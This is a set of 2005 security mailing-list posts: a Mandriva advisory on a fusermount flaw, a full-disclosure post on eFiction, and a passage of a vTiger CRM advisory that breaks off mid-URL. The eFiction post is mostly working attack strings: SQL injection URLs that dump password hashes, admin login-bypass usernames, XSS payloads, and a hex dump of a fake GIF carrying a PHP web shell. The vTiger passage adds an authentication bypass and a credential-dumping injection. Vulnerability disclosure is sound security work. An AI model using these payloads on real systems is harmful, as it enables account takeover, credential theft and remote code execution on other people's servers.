MDKSA-2005:216 - Updated fuse packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:216 http://www.mandriva.com/security/ ___ Package : fuse Date: November 24, 2005 Affected: 2006.0 ___ Problem Description: Thomas Beige found that fusermount failed to securely handle special characters specified in mount points, which could allow a local attacker to corrupt the contents of /etc/mtab by mounting over a maliciously-named directory using fusermount. This could potentially allow the attacker to set unauthorized mount options. This is only possible when fusermount is installed setuid root, which is the case in Mandriva Linux. The updated packages have been patched to address these problems. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3531 ___ Updated Packages: Mandriva Linux 2006.0: a3ae4ac8ed8a96214bbe1801722fd68e 2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.i586.rpm 7703d6d4e053663bfa3712a6302c07be 2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.i586.rpm 4daead454fd46fb8ea95953d9a1d3b12 2006.0/RPMS/libfuse2-2.3.0-2.1.20060mdk.i586.rpm db457d4c29b4d8d19d34434086e12fc7 2006.0/RPMS/libfuse2-devel-2.3.0-2.1.20060mdk.i586.rpm 86880673c11a93aa8a9001d79416f962 2006.0/RPMS/libfuse2-static-devel-2.3.0-2.1.20060mdk.i586.rpm 88ec22000581f550f0f2c11f29e70b0c 2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: c94bfcb85845fd023fd2edfe88af55a4 x86_64/2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.x86_64.rpm bbbfc58364a1ceaeb363428e1cd9423c x86_64/2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.x86_64.rpm 5b0cd9cef709bfcf624b35880c5fab46 x86_64/2006.0/RPMS/lib64fuse2-2.3.0-2.1.20060mdk.x86_64.rpm 80ba54b4cb2467f9d2045114fa859873 x86_64/2006.0/RPMS/lib64fuse2-devel-2.3.0-2.1.20060mdk.x86_64.rpm 8aa436b1cb28f893fd68ba2fa53ae76e x86_64/2006.0/RPMS/lib64fuse2-static-devel-2.3.0-2.1.20060mdk.x86_64.rpm 88ec22000581f550f0f2c11f29e70b0c x86_64/2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDhgLfmqjQ0CJFipgRAgZMAKCoUKqr+XKmjG91tB9as/8jQjIO5wCg7pCN k7oCnFekKIWVLBUz0x1ff+Q= =X3aa -END PGP SIGNATURE-
eFiction = 2.0 multiple vulnerabilities
efiction = 2.0 remote code execution / SQL injection / login bypass / cross site scripting / path information disclosure software: site: http://www.efiction.wallflowergirl.com/index.php description: Efiction is a software program that enables users to run automated original or fanfiction archives on their websites. The program is PHP and MySQL database driven and is released as open-source software. i) xss: efiction 1.0/1.1: http://[target]/efiction/titles.php?action=viewlistlet=scriptalert(document.cookie)/script on version 2.0, thorugh sql injection: http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,'scriptalert(document.cookie)/script',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* ii) if magic_quotes_gpc off - SQL INJECTION: you can see at screen any admin/user MD5 password hash efiction 1.0: http://[target]/[path]/authors.php?action=viewlistlet='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/* http://[target]/[path]/authors.php?action=viewlistlet=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*offset=0,40/* http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* efiction 1.1: http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/* http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/* http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/* efiction 2.0 http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/* iii) if magic_quotes_gpc off - Login bypass: you can login as admin typing: efiction 1.0: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM fanfiction_authors where level=1/* password: [nothing] efiction 1.1: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories FROM fanfiction_authors where level=1/* password: [nothing] efiction 2.0: username: 'UNION SELECT 'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent FROM fanfiction_authors where level=1/* password: [nothing] ^ | | this is the hash of [nothing] iv) remote code execution (1.0/1.1/2.0): register, a temporary password will be sent to you by email, login, goto Manage Images (or go to http://target/path/user.php?action=manageimagesupload=upload), choose Upload new image, upload a fake gif cmd.php like this (this is the hexadecimal dump): :47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4GIF89a÷..¤¶¤ 0010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4...ô..w..k.L...ô 0020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00.iw..ø.nbg.. 0030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00.4.u.aÀ. 0040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00... 0050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00.©.. ... 0060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00.o...V.. 0070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72...?php error_r 0080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5feporting(0);ini_ 0090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69set(max_executi 00a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74on_time,0);syst 00b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3fem($_GET[cmd]);? 00c0:3e 38 00 00 e5 00 00
Mandriva Security
does anybody know how to contact Mandriva Security? I drop three security contact messages to [EMAIL PROTECTED] , but all no response ... :(
Re: Advisory 23/2005: vTiger multiple vulnerabilities
Hello, Here, too: one quick fix: -3. Turn magic_quotes_gpc off. +3. Turn magic_quotes_gpc on. Regards, --ck
Advisory 23/2005: vTiger multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hardened PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: Multiple vulnerabilities in vTiger CRM
Release Date: 2005/11/24
Last Modified: 2005/11/24
Author: Christopher Kunz [EMAIL PROTECTED]
Application: vTiger 4.2 and prior
Severity: Cross-Site Scripting, SQL injection and information
disclosure, password hash disclosure, authentication bypass,
local file disclosure, remote code execution
Risk: High / Critical (depending on server configuration)
Vendor Status: Vendor informed. No fix available.
References: http://www.hardened-php.net/advisory_232005.105.html
Overview:
vtiger [1] is an open source customer relationship management system (CRM)
which is maintained by an indian company with the same name. It has been
forked off the SugarCRM project [2] in an earlier stage, thus a number of
issues reported by GulfTech Security in [3] are also present in vtiger. An
additional layer of insecurity has obviously been introduced by the devel-
opers, enabling malicious users to log in to the CRM without any creden-
tials whatsoever and execute remote code.
Details:
1) XSS issues-a-plenty
As James Bercegay reported, there is an abundance of XSS problems all
over the CRM, with only a few examples being the following:
- a malicious local user could create a contact, lead, account, poten-
tial or other data set that includes script code in any field. Typi-
cal fields would be first or last name, but nearly every other field
is possible, too. Then, the malicious user could send the link to
that contact to the administrator - and have the script code do what-
ever DOM operation is necessary to elevate privileges.
- Even easier and without any inside knowledge needed:
/index.php?action=DetailViewmodule=Leadsrecord=%3Cscript%3Ealert
('document.cookie')%3C/script%3E (as reported by James).
- Since the variable $_SERVER['PHP_SELF'] is used for most form actions,
and also for creating internal links, the string scriptalert('xss')
/script can be used to create a path-info XSS that exploits any
logged-in user. The URI parameters are irrelevant and have been
ommitted to keep the example clean.
Example:
/index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]
2) Remote XSS in RSS
vtiger features a comprehensive RSS aggregation module, allowing users
to read all their favorite blogs, news sites or other feeds from within
the CRM. However, no input checking is performed before aggregated feeds
are sent to the client. A malicious blog, news site or other feed could
socially engineer a user into aggregating it and then use script code to
elevate their privileges via DOM.
We are featuring this as a different attack class since the vector does
not require the CRM user to click on any links - being subscribed to an
seemingly interesting blog is enough to fall victim to this attack.
3) Authentication Bypass
If the php.ini setting magic_quotes_gpc is set to Off, which is the
setting provided in php.ini-recommended, an attacker can bypass the
authentication process completely, by entering a fabricated user name.
Since the login form is prone to SQL injection (like any other form),
a username like foo' or '%'=' leads to the following SQL statement:
SELECT*
FROM users
WHERE user_name='admin'
OR'%'='%'
AND user_password='adAZ2jidC3H1M'
This query returns 1 row with the administrator's credentials. This re-
sult set is used to determine that authentication was successful.
The attacker is now logged into the CRM system as the administrator and
can perform tasks like uploading the whole CRM instance to a remote sys-
tem, display system information - and of course mess around with the
customer data.
4) User credential disclosure via SQL Injection
Again, if magic_quotes_gpc is Off, a logged-in user can manipulate many
form fields into displaying arbitrary values, including user names and
passwords. Again, similar issues were reported by GulfTech - we have
found some more injection vulnerabilities like this one:
/?ticket_title=contact_name=priority=status=action=indexquery=truem
odule=HelpDeskorder_by=sorder=ASCviewname=0button=Searchcategory=da
te_crit=isdate=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+
user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1
